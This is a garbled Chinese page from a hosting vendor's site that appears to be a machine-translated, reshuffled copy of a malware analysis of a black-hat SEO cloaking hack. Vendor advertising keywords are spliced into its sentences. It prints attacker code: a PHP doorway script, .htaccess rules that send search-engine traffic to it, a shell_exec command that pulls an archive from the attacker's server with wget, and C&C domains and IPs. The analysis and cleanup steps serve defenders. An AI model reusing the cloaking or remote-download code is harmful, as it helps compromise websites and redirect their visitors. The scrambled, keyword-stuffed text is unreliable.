香港高防服务器_网站防ddos_免费试用
服务器
国内DDoS防御_香港高防IP防护DDoS攻击-寒冰互联
寒冰云联
2021-11-17 15:18

现在我们知道黑客选择将用作门口的URL。那么,为什么他们不仅选择常规网页,还选择可下载的文档文件:PDF、Microsoft Word等?以下摘自解码门口脚本的摘录解释了原因:如果($bot){$pdf+=0;if($pdf==1){header("内容类型:application/pdf");}if($pdf==2){header("内容类型:image/png");}if($pdf==3){header("内容类型:text/xml");}如果($pdf==4){$contenttype=@base64_decode($contenttype);$types=explode("\n",$contenttype);foreach($val类型){$val=修剪($val);如果($val!="")标题($val);}}返回内容;退出;这可能是因为希望谷歌不太可能考虑这些文件,并链接到他们,比如垃圾邮件。,当一个网站链接到各种媒体下载,ddos防御工具免费,防御cc是需要硬件防火墙吗,而不仅仅是传统的网页时,这看起来似乎是合理的。同时,对于门口脚本来说,不管它是.html、.php还是.pdf,它都会重定向其合格URL列表中的任何请求。

不寻常的门口扩展

香港高防服务器_网站防ddos_免费试用

来自.htaccess的门口脚本并不是黑客上传的唯一恶意PHP文件。在被破坏的网站上,我们通常ind多个重复脚本(相同的内容,但模糊处理略有不同)在不同的子目录中。它们的文件名也遵循相同的模式:word1-word2.php,其中word1和word2是绝对随机的英语单词。

正如我们在症状列表中已经提到的,这脚本不会为每个网站页面生成垃圾邮件内容(尽管它可以)。它只会为特定的现有URL生成垃圾邮件内容,并为这些URL找到准备好的规则和模板。这些规则和模板存储在服务器的全局临时目录(通常为/tmp或/var/tmp)中,该恶意软件会在其中创建子目录(域名的md5散列用作其名称)。

当人们点击谷歌、必应或雅虎的搜索结果时,他们会被重定向到色情网站。在所有其他情况下,无法触发重定向。只有真正合法的页面重定向。没有新的门户(通常发生在制药和复制垃圾邮件黑客中)被创建。并非所有真正的网页都重定向到色情(例如,主页几乎从不重定向),但那些重定向到色情的网页总是重定向。这适用于所有类型的网站:WordPress、论坛、自定义和纯HTML网站。当网站管理员检查重定向到色情网站的页面代码时(在纯HTML网站上很容易做到),他们并没有发现任何恶意内容。如果他们用"像谷歌一样抓取"(通过搜索控制台)或在Unmask Paradises中检查相同的页面,他们会发现这些页面上有大量色情关键词,并有20个链接块指向其他类似黑客网站上的色情门户。在垃圾邮件链接块中,我们经常看到指向PDF、DOC、SWF和其他文件的链接,浏览器将这些文件视为下载文件或只有在额外插件的帮助下才能打开的文件。如果你用谷歌推荐人打开这些链接,它们会重定向到色情网站。如果没有搜索引擎推荐人,您将下载真正合法的文件。

与缓存在服务器上的搜索引擎垃圾邮件内容不同并且可以偶尔更新,搜索引擎访客的重定向代码总是在运行中从远程控制服务器加载。

.Htaccess

门口脚本

重写条件告诉我们,高防cdn无视任何ddos,搜索引擎机器人程序和来自搜索引擎结果的用户向服务器发出的所有请求都被重新路由到门口脚本(其名称在每个网站上都不同,但始终是两个真正的字典单词的组合,如bray-anointing.php、biomedical-case.php、elipball-cruisers.php等).

查找并删除所有后门(类型1和类型2)。从.htaccess中删除恶意代码。查找并删除所有门口脚本。在极少数情况下,您可能会发现门口数据存储在站点的子目录中(其名称应为32位十六进制数)。它也应该被删除。更改所有站点密码:FTP、CMS等。确保您在站点上使用的所有软件(如果您在多个站点上使用一个帐户,则为多个站点)都是最新的,并且已完全修补。由于许多受黑帽搜索引擎优化活动影响的网站被谷歌标记为"可能被黑客入侵",一旦网站清理完毕,你需要使用搜索控制台通知谷歌。

作为一个典型的SEO伪装脚本,它为搜索引擎机器人和人类访问者提供了不同的内容。任何对该脚本的直接请求都将导致404错误页面,以帮助隐藏自己免受窥视。

$cmd="cd$tmppath;wget$domain/arc/$md5host.tgz-O 1.tgz;tar-xzf 1.tgz;rm-rf 1.tgz";...echo shell_exec($cmd);

解码时,两种类型的后门做的事情几乎相同:执行自定义HTTP头中传递的PHP编码。

该脚本有一个特殊命令,可从黑客自己的服务器下载并解压这些规则。

后门

f.menyudnya[.]com–195.154.73.79(更新:f.menyudnya.com 195.154.73.79和78.46.100.45)k-fish-ka[.]ru-195.154.165.135(更新日期:k-fish-ka.ru 195.154.165.135)x3.megalolik[.]com–46.4.121.189(更新: 195.154.73.79)menotepoer[.]com–46.4.121.189x2.megalolik[.]com–195.154.165.135

这种方法允许黑客从他们所有的门口收集实时使用数据,立即能够在每个被入侵站点的所有门口更改重定向URL。

使用随机单词的爱好并没有到此为止。这种攻击还使用两种类型的后门,分散在不同的子目录中。

因此,与更广泛的方案不同,这种攻击直接在受损站点上动态生成门口,而是在远程控制服务器上为每个受损站点生成一组门口,ddos攻击防御与waf防御,然后他们使用特殊命令上传。这样,他们可以随时更新门口内容。这种方法h结合了静态门口的速度和动态门口的灵活性,动态门口每次都从远程服务器获取内容。

控制服务器的门口数据更新

第一种类型使用更长的文件名,如nav menu accentuate-carrion.php、icon-pointer-2x_indesit.php等。这些文件的模糊内容非常短:

如果您的站点受到此攻击的影响,您需要

到目前为止,黑客使用了以下C&C服务器:

RewriteCond%{ENV:REDIRECT_STATUS}200重写规则^-[L]重写cond%{HTTP|u USER|u AGENT}(谷歌|雅虎| msn |美国在线|必应)[或]重写cond%{HTTP|u REFERER}(谷歌|雅虎| msn |美国在线|必应)RewriteRule^(.*)$authentically nerment.php?$1[L]

我们在这个博客上写了很多关于各种黑帽搜索引擎优化黑客的文章,你们中的大多数人已经熟悉了诸如门口、伪装和搜索引擎优化毒害之类的东西。这次我们将告诉你另一个有趣的黑帽搜索引擎优化攻击,这是我们去年一直关注的。让我们从症状开始:

让我们看看门口脚本的内部,看看它是如何工作的: